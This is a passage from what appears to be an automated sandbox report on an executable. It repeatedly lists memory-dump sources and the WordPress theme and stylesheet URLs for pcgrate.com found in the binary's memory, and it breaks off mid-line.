              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/js/main.min.js?ver=9.12.0
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/lib/custom-scrollbar/custom-scrollbar.min.css?ver=9
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/lib/custom-scrollbar/custom-scrollbar.min.js?ver=9.
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/lib/jquery-mousewheel/jquery-mousewheel.min.js?ver=
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/style.css?ver=9.12.0
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/elementor/css/global.css?ver=1690560605
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/elementor/css/post-1009.css?ver=1690560605
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/elementor/css/post-1185.css?ver=1690560605
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/elementor/css/post-17.css?ver=1690560605
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/favicon.png
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/compatibility/wc-dt-custom.css?ver=c08792de11d2
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/css-vars.css?ver=c08792de11d2
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 